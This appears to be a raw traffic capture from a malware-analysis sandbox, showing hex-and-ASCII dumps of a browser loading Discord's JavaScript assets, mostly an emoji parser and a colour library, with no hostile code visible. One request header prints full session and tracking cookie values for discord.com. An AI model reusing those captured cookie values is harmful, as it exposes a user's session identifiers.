                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 72 6e 20 73 3c 36 35 35 33 36 3f 6e 28 73 29 3a 6e 28 35 35 32 39 36 2b 28 28 73 2d 3d 36 35 35 33 36 29 3e 3e 31 30 29 2c 35 36 33 32 30 2b 28 31 30 32 33 26 73 29 29 7d 2c 74 6f 43 6f 64 65 50 6f 69 6e 74 3a 67 7d 2c 6f 6e 65 72 72 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 68 69 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 28 6f 28 74 68 69 73 2e 61 6c 74 2c 21 31 29 2c 74 68 69 73 29 7d 2c 70 61 72 73 65 3a 66 75 6e 63 74 69 6f 6e 28 73 2c 65 29 7b 76 61 72 20 75 3b 72 65 74 75 72 6e 28 21 65 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 29 26 26 28 65 3d 7b 63 61 6c 6c 62 61 63 6b 3a 65 7d 29 2c 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20
                                                                          Data Ascii: rn s<65536?n(s):n(55296+((s-=65536)>>10),56320+(1023&s))},toCodePoint:g},onerror:function(){this.parentNode&&this.parentNode.replaceChild(o(this.alt,!1),this)},parse:function(s,e){var u;return(!e||"function"==typeof e)&&(e={callback:e}),("string"==typeof
                                                                          2023-12-10 16:45:09 UTC1248INData Raw: 21 30 29 29 2c 69 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 28 6e 2c 69 29 29 7d 72 65 74 75 72 6e 20 74 7d 29 28 73 2c 7b 63 61 6c 6c 62 61 63 6b 3a 65 2e 63 61 6c 6c 62 61 63 6b 7c 7c 69 2c 61 74 74 72 69 62 75 74 65 73 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 2e 61 74 74 72 69 62 75 74 65 73 3f 65 2e 61 74 74 72 69 62 75 74 65 73 3a 62 2c 62 61 73 65 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 2e 62 61 73 65 3f 65 2e 62 61 73 65 3a 74 2e 62 61 73 65 2c 65 78 74 3a 65 2e 65 78 74 7c 7c 74 2e 65 78 74 2c 73 69 7a 65 3a 65 2e 66 6f 6c 64 65 72 7c 7c 28 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 28 75 3d 65 2e 73 69 7a 65 7c 7c 74 2e 73 69 7a 65 29 3f 75 2b 22 78 22 2b 75 3a 75 29 2c 63
                                                                          Data Ascii: !0)),i.parentNode.replaceChild(n,i))}return t})(s,{callback:e.callback||i,attributes:"function"==typeof e.attributes?e.attributes:b,base:"string"==typeof e.base?e.base:t.base,ext:e.ext||t.ext,size:e.folder||("number"==typeof(u=e.size||t.size)?u+"x"+u:u),c
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 63 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 64 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 64 5c 75 32 30 30 64 5c
                                                                          Data Ascii: 68\ud83c[\udffb-\udfff]|\ud83d\udc69\ud83c\udffc\u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83d\udc69\ud83c[\udffb-\udfff]|\ud83d\udc69\ud83c\udffd\u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83d\udc68\ud83c[\udffb-\udfff]|\ud83d\udc69\ud83c\udffd\u200d\
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 31 64 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 63 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5c 75 64 66 66 63 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5c 75 64 66 66 63 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 64 31 64 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 5c 75 64 66 66 64 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5c 75 64 66 66 64 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c
                                                                          Data Ascii: 1d\u200d\ud83d\udc68\ud83c[\udffc-\udfff]|\ud83d\udc68\ud83c\udffc\u200d\u2764\ufe0f\u200d\ud83d\udc68\ud83c[\udffb-\udfff]|\ud83d\udc68\ud83c\udffc\u200d\ud83e\udd1d\u200d\ud83d\udc68\ud83c[\udffb\udffd-\udfff]|\ud83d\udc68\ud83c\udffd\u200d\u2764\ufe0f\
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 75 64 66 66 62 5c 75 64 66 66 64 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 64 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 64 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 64 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 64 31 64 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66
                                                                          Data Ascii: udffb\udffd-\udfff]|\ud83d\udc69\ud83c\udffd\u200d\u2764\ufe0f\u200d\ud83d\udc68\ud83c[\udffb-\udfff]|\ud83d\udc69\ud83c\udffd\u200d\u2764\ufe0f\u200d\ud83d\udc69\ud83c[\udffb-\udfff]|\ud83d\udc69\ud83c\udffd\u200d\ud83e\udd1d\u200d\ud83d\udc68\ud83c[\udf
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 66 5d 7c 5c 75 64 38 33 65 5c 75 64 64 64 31 5c 75 64 38 33 63 5c 75 64 66 66 64 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 64 64 31 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 5c 75 64 66 66 63 5c 75 64 66 66 65 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 64 64 31 5c 75 64 38 33 63 5c 75 64 66 66 64 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 64 31 64 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 64 64 31 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 64 64 31 5c 75 64 38 33 63 5c 75 64 66 66 65 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 64 64 31 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64
                                                                          Data Ascii: f]|\ud83e\uddd1\ud83c\udffd\u200d\u2764\ufe0f\u200d\ud83e\uddd1\ud83c[\udffb\udffc\udffe\udfff]|\ud83e\uddd1\ud83c\udffd\u200d\ud83e\udd1d\u200d\ud83e\uddd1\ud83c[\udffb-\udfff]|\ud83e\uddd1\ud83c\udffe\u200d\u2764\ufe0f\u200d\ud83e\uddd1\ud83c[\udffb-\ud
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 2d 5c 75 64 63 36 64 5c 75 64 63 38 66 5c 75 64 63 39 31 5d 7c 5c 75 64 38 33 65 5c 75 64 64 31 64 29 7c 28 3f 3a 5c 75 64 38 33 64 5b 5c 75 64 63 36 38 5c 75 64 63 36 39 5d 7c 5c 75 64 38 33 65 5c 75 64 64 64 31 29 28 3f 3a 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 29 3f 5c 75 32 30 30 64 28 3f 3a 5c 75 32 36 39 35 5c 75 66 65 30 66 7c 5c 75 32 36 39 36 5c 75 66 65 30 66 7c 5c 75 32 37 30 38 5c 75 66 65 30 66 7c 5c 75 64 38 33 63 5b 5c 75 64 66 33 65 5c 75 64 66 37 33 5c 75 64 66 37 63 5c 75 64 66 38 34 5c 75 64 66 39 33 5c 75 64 66 61 34 5c 75 64 66 61 38 5c 75 64 66 65 62 5c 75 64 66 65 64 5d 7c 5c 75 64 38 33 64 5b 5c 75 64 63 62 62 5c 75 64 63 62 63 5c 75 64 64 32 37 5c 75 64 64 32 63 5c 75 64 65 38 30 5c 75 64 65 39 32 5d 7c 5c
                                                                          Data Ascii: -\udc6d\udc8f\udc91]|\ud83e\udd1d)|(?:\ud83d[\udc68\udc69]|\ud83e\uddd1)(?:\ud83c[\udffb-\udfff])?\u200d(?:\u2695\ufe0f|\u2696\ufe0f|\u2708\ufe0f|\ud83c[\udf3e\udf73\udf7c\udf84\udf93\udfa4\udfa8\udfeb\udfed]|\ud83d[\udcbb\udcbc\udd27\udd2c\ude80\ude92]|\
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 36 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 37 5c 75 32 30 30 64 5c 75 64 38 33 64 5b 5c 75 64 63 36 36 5c 75 64 63 36 37 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 32 30 30 64 5c 75 64 38 33 64 5b 5c 75 64 63 36 36 5c 75 64 63 36 37 5d 7c 5c 75 64 38 33 63 5c 75 64 66 66 33 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 32 36 61 37 5c 75 66 65 30 66 7c 5c 75 64 38 33 63 5c 75 64 66 66 33 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 63 5c 75 64 66 30 38 7c 5c 75 64 38 33 64 5c 75 64 65 33 36 5c 75 32 30 30 64 5c 75 64 38 33 63 5c 75 64 66 32 62 5c 75 66 65 30 66 7c 5c 75 32 37 36 34 5c 75 66 65 30 66 5c
                                                                          Data Ascii: 200d\ud83d\udc66|\ud83d\udc69\u200d\ud83d\udc67\u200d\ud83d[\udc66\udc67]|\ud83d\udc69\u200d\ud83d\udc69\u200d\ud83d[\udc66\udc67]|\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f|\ud83c\udff3\ufe0f\u200d\ud83c\udf08|\ud83d\ude36\u200d\ud83c\udf2b\ufe0f|\u2764\ufe0f\


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          231192.168.2.549964162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:09 UTC866OUTGET /assets/21396.259a270b7e3f8803a333.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=dPS26sSQJQbE3uPVddYoKuGobua4yJj6RAT9CXWe_4s-1702226708068-0-604800000
                                                                          2023-12-10 16:45:09 UTC979INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 34 38 31 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 65 34 63 64 37 34 33 31 65 39 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:09 GMTContent-Type: application/javascriptContent-Length: 14811Connection: closeCF-Ray: 8336f4e4cd7431e9-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:09 UTC390INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 32 31 33 39 36 22 5d 2c 7b 36 35 36 32 38 30 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 65 29 7b 74 3d 65 2e 6e 6d 64 28 74 29 2c 65 28 22 34 32 34 39 37 33 22 29 2c 65 28 22 37 38 31 37 33 38 22 29 2c 21 66 75 6e 63 74 69 6f 6e 28 72 29 7b 76 61 72 20 65 2c 6e 2c 61 2c 69 3d 2f 5e 5c 73 2b 2f 2c 73 3d 2f 5c 73 2b 24 2f 2c 6f 3d 30 2c 66 3d 72 2e 72 6f 75 6e 64 2c 68 3d 72 2e 6d 69 6e 2c 75 3d 72 2e 6d 61 78 2c 6c 3d 72 2e 72 61 6e 64 6f 6d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 74 2c 65 29 7b 69 66 28 65 3d 65 7c 7c 7b 7d 2c 28 74 3d 74 7c 7c 22
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["21396"],{656280:function(t,r,e){t=e.nmd(t),e("424973"),e("781738"),!function(r){var e,n,a,i=/^\s+/,s=/\s+$/,o=0,f=r.round,h=r.min,u=r.max,l=r.random;function c(t,e){if(e=e||{},(t=t||"
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 3d 21 31 3b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 3d 74 2e 72 65 70 6c 61 63 65 28 69 2c 22 22 29 2e 72 65 70 6c 61 63 65 28 73 2c 22 22 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 76 61 72 20 72 2c 65 3d 21 31 3b 69 66 28 71 5b 74 5d 29 74 3d 71 5b 74 5d 2c 65 3d 21 30 3b 65 6c 73 65 20 69 66 28 22 74 72 61 6e 73 70 61 72 65 6e 74 22 3d 3d 74 29 72 65 74 75 72 6e 7b 72 3a 30 2c 67 3a 30 2c 62 3a 30 2c 61 3a 30 2c 66 6f 72 6d 61 74 3a 22 6e 61 6d 65 22 7d 3b 69 66 28 72 3d 50 2e 72 67 62 2e 65 78 65 63 28 74 29 29 72 65 74 75 72 6e 7b 72 3a 72 5b 31 5d 2c 67 3a 72 5b 32 5d 2c 62 3a 72 5b 33 5d 7d 3b 69 66 28 72 3d 50 2e 72 67 62 61 2e 65 78 65 63 28 74 29 29 72 65
                                                                          Data Ascii: =!1;return"string"==typeof t&&(t=function(t){t=t.replace(i,"").replace(s,"").toLowerCase();var r,e=!1;if(q[t])t=q[t],e=!0;else if("transparent"==t)return{r:0,g:0,b:0,a:0,format:"name"};if(r=P.rgb.exec(t))return{r:r[1],g:r[2],b:r[3]};if(r=P.rgba.exec(t))re
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 24 28 74 2e 6c 29 26 26 28 61 3d 54 28 74 2e 73 29 2c 66 3d 54 28 74 2e 6c 29 2c 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 65 29 7b 76 61 72 20 6e 2c 61 2c 69 3b 66 75 6e 63 74 69 6f 6e 20 73 28 74 2c 72 2c 65 29 7b 72 65 74 75 72 6e 28 65 3c 30 26 26 28 65 2b 3d 31 29 2c 65 3e 31 26 26 28 65 2d 3d 31 29 2c 65 3c 31 2f 36 29 3f 74 2b 28 72 2d 74 29 2a 36 2a 65 3a 65 3c 2e 35 3f 72 3a 65 3c 32 2f 33 3f 74 2b 28 72 2d 74 29 2a 28 32 2f 33 2d 65 29 2a 36 3a 74 7d 69 66 28 74 3d 4c 28 74 2c 33 36 30 29 2c 72 3d 4c 28 72 2c 31 30 30 29 2c 65 3d 4c 28 65 2c 31 30 30 29 2c 30 3d 3d 3d 72 29 6e 3d 61 3d 69 3d 65 3b 65 6c 73 65 7b 76 61 72 20 6f 3d 65 3c 2e 35 3f 65 2a 28 31 2b 72 29 3a 65 2b 72 2d 65 2a 72 2c 66 3d 32 2a 65 2d 6f 3b 6e 3d 73 28 66 2c 6f 2c 74
                                                                          Data Ascii: $(t.l)&&(a=T(t.s),f=T(t.l),e=function(t,r,e){var n,a,i;function s(t,r,e){return(e<0&&(e+=1),e>1&&(e-=1),e<1/6)?t+(r-t)*6*e:e<.5?r:e<2/3?t+(r-t)*(2/3-e)*6:t}if(t=L(t,360),r=L(r,100),e=L(e,100),0===r)n=a=i=e;else{var o=e<.5?e*(1+r):e+r-e*r,f=2*e-o;n=s(f,o,t
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 2e 34 29 29 7d 2c 73 65 74 41 6c 70 68 61 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 61 3d 49 28 74 29 2c 74 68 69 73 2e 5f 72 6f 75 6e 64 41 3d 66 28 31 30 30 2a 74 68 69 73 2e 5f 61 29 2f 31 30 30 2c 74 68 69 73 7d 2c 74 6f 48 73 76 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 62 28 74 68 69 73 2e 5f 72 2c 74 68 69 73 2e 5f 67 2c 74 68 69 73 2e 5f 62 29 3b 72 65 74 75 72 6e 7b 68 3a 33 36 30 2a 74 2e 68 2c 73 3a 74 2e 73 2c 76 3a 74 2e 76 2c 61 3a 74 68 69 73 2e 5f 61 7d 7d 2c 74 6f 48 73 76 53 74 72 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 62 28 74 68 69 73 2e 5f 72 2c 74 68 69 73 2e 5f 67 2c 74 68 69 73 2e 5f 62 29 2c 72 3d 66 28 33 36 30 2a 74 2e 68 29 2c 65 3d 66 28 31 30 30 2a 74 2e
                                                                          Data Ascii: .4))},setAlpha:function(t){return this._a=I(t),this._roundA=f(100*this._a)/100,this},toHsv:function(){var t=b(this._r,this._g,this._b);return{h:360*t.h,s:t.s,v:t.v,a:this._a}},toHsvString:function(){var t=b(this._r,this._g,this._b),r=f(360*t.h),e=f(100*t.
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 28 74 68 69 73 2e 5f 67 29 2b 22 2c 20 22 2b 66 28 74 68 69 73 2e 5f 62 29 2b 22 2c 20 22 2b 74 68 69 73 2e 5f 72 6f 75 6e 64 41 2b 22 29 22 7d 2c 74 6f 50 65 72 63 65 6e 74 61 67 65 52 67 62 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 72 3a 66 28 31 30 30 2a 4c 28 74 68 69 73 2e 5f 72 2c 32 35 35 29 29 2b 22 25 22 2c 67 3a 66 28 31 30 30 2a 4c 28 74 68 69 73 2e 5f 67 2c 32 35 35 29 29 2b 22 25 22 2c 62 3a 66 28 31 30 30 2a 4c 28 74 68 69 73 2e 5f 62 2c 32 35 35 29 29 2b 22 25 22 2c 61 3a 74 68 69 73 2e 5f 61 7d 7d 2c 74 6f 50 65 72 63 65 6e 74 61 67 65 52 67 62 53 74 72 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 31 3d 3d 74 68 69 73 2e 5f 61 3f 22 72 67 62 28 22 2b 66 28 31 30 30 2a 4c 28 74 68 69 73 2e 5f 72 2c 32 35
                                                                          Data Ascii: (this._g)+", "+f(this._b)+", "+this._roundA+")"},toPercentageRgb:function(){return{r:f(100*L(this._r,255))+"%",g:f(100*L(this._g,255))+"%",b:f(100*L(this._b,255))+"%",a:this._a}},toPercentageRgbString:function(){return 1==this._a?"rgb("+f(100*L(this._r,25
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 74 6f 48 65 78 53 74 72 69 6e 67 28 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 28 74 68 69 73 2e 74 6f 53 74 72 69 6e 67 28 29 29 7d 2c 5f 61 70 70 6c 79 4d 6f 64 69 66 69 63 61 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 76 61 72 20 65 3d 74 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 5b 74 68 69 73 5d 2e 63 6f 6e 63 61 74 28 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 72 29 29 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 72 3d 65 2e 5f 72 2c 74 68 69 73 2e 5f 67 3d 65 2e 5f 67 2c 74 68 69 73 2e 5f 62 3d 65 2e 5f 62 2c 74 68 69 73 2e 73 65 74 41 6c 70 68 61 28 65 2e 5f 61 29 2c 74 68 69 73 7d 2c 6c 69 67 68 74 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 61 70 70 6c 79 4d 6f
                                                                          Data Ascii: toHexString()},clone:function(){return c(this.toString())},_applyModification:function(t,r){var e=t.apply(null,[this].concat([].slice.call(r)));return this._r=e._r,this._g=e._g,this._b=e._b,this.setAlpha(e._a),this},lighten:function(){return this._applyMo
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 69 2c 73 2c 6f 3d 28 6e 2b 61 29 2f 32 3b 69 66 28 6e 3d 3d 61 29 69 3d 73 3d 30 3b 65 6c 73 65 7b 76 61 72 20 66 3d 6e 2d 61 3b 73 77 69 74 63 68 28 73 3d 6f 3e 2e 35 3f 66 2f 28 32 2d 6e 2d 61 29 3a 66 2f 28 6e 2b 61 29 2c 6e 29 7b 63 61 73 65 20 74 3a 69 3d 28 72 2d 65 29 2f 66 2b 28 72 3c 65 3f 36 3a 30 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 72 3a 69 3d 28 65 2d 74 29 2f 66 2b 32 3b 62 72 65 61 6b 3b 63 61 73 65 20 65 3a 69 3d 28 74 2d 72 29 2f 66 2b 34 7d 69 2f 3d 36 7d 72 65 74 75 72 6e 7b 68 3a 69 2c 73 3a 73 2c 6c 3a 6f 7d 7d 66 75 6e 63 74 69 6f 6e 20 62 28 74 2c 72 2c 65 29 7b 74 3d 4c 28 74 2c 32 35 35 29 2c 72 3d 4c 28 72 2c 32 35 35 29 3b 76 61 72 20 6e 2c 61 3d 75 28 74 2c 72 2c 65 3d 4c 28 65 2c 32 35 35 29 29 2c 69 3d 68 28 74 2c 72 2c 65
                                                                          Data Ascii: i,s,o=(n+a)/2;if(n==a)i=s=0;else{var f=n-a;switch(s=o>.5?f/(2-n-a):f/(n+a),n){case t:i=(r-e)/f+(r<e?6:0);break;case r:i=(e-t)/f+2;break;case e:i=(t-r)/f+4}i/=6}return{h:i,s:s,l:o}}function b(t,r,e){t=L(t,255),r=L(r,255);var n,a=u(t,r,e=L(e,255)),i=h(t,r,e
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 25 33 36 30 3b 72 65 74 75 72 6e 20 65 2e 68 3d 6e 3c 30 3f 33 36 30 2b 6e 3a 6e 2c 63 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 77 28 74 29 7b 76 61 72 20 72 3d 63 28 74 29 2e 74 6f 48 73 6c 28 29 3b 72 65 74 75 72 6e 20 72 2e 68 3d 28 72 2e 68 2b 31 38 30 29 25 33 36 30 2c 63 28 72 29 7d 66 75 6e 63 74 69 6f 6e 20 53 28 74 29 7b 76 61 72 20 72 3d 63 28 74 29 2e 74 6f 48 73 6c 28 29 2c 65 3d 72 2e 68 3b 72 65 74 75 72 6e 5b 63 28 74 29 2c 63 28 7b 68 3a 28 65 2b 31 32 30 29 25 33 36 30 2c 73 3a 72 2e 73 2c 6c 3a 72 2e 6c 7d 29 2c 63 28 7b 68 3a 28 65 2b 32 34 30 29 25 33 36 30 2c 73 3a 72 2e 73 2c 6c 3a 72 2e 6c 7d 29 5d 7d 66 75 6e 63 74 69 6f 6e 20 48 28 74 29 7b 76 61 72 20 72 3d 63 28 74 29 2e 74 6f 48 73 6c 28 29 2c 65 3d 72 2e 68 3b 72 65 74 75 72 6e
                                                                          Data Ascii: %360;return e.h=n<0?360+n:n,c(e)}function w(t){var r=c(t).toHsl();return r.h=(r.h+180)%360,c(r)}function S(t){var r=c(t).toHsl(),e=r.h;return[c(t),c({h:(e+120)%360,s:r.s,l:r.l}),c({h:(e+240)%360,s:r.s,l:r.l})]}function H(t){var r=c(t).toHsl(),e=r.h;return
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 22 41 41 22 21 3d 3d 72 26 26 22 41 41 41 22 21 3d 3d 72 26 26 28 72 3d 22 41 41 22 29 2c 22 73 6d 61 6c 6c 22 21 3d 3d 65 26 26 22 6c 61 72 67 65 22 21 3d 3d 65 26 26 28 65 3d 22 73 6d 61 6c 6c 22 29 2c 7b 6c 65 76 65 6c 3a 72 2c 73 69 7a 65 3a 65 7d 7d 28 65 29 29 2e 6c 65 76 65 6c 2b 6e 2e 73 69 7a 65 29 7b 63 61 73 65 22 41 41 73 6d 61 6c 6c 22 3a 63 61 73 65 22 41 41 41 6c 61 72 67 65 22 3a 61 3d 69 3e 3d 34 2e 35 3b 62 72 65 61 6b 3b 63 61 73 65 22 41 41 6c 61 72 67 65 22 3a 61 3d 69 3e 3d 33 3b 62 72 65 61 6b 3b 63 61 73 65 22 41 41 41 73 6d 61 6c 6c 22 3a 61 3d 69 3e 3d 37 7d 72 65 74 75 72 6e 20 61 7d 2c 63 2e 6d 6f 73 74 52 65 61 64 61 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 65 29 7b 76 61 72
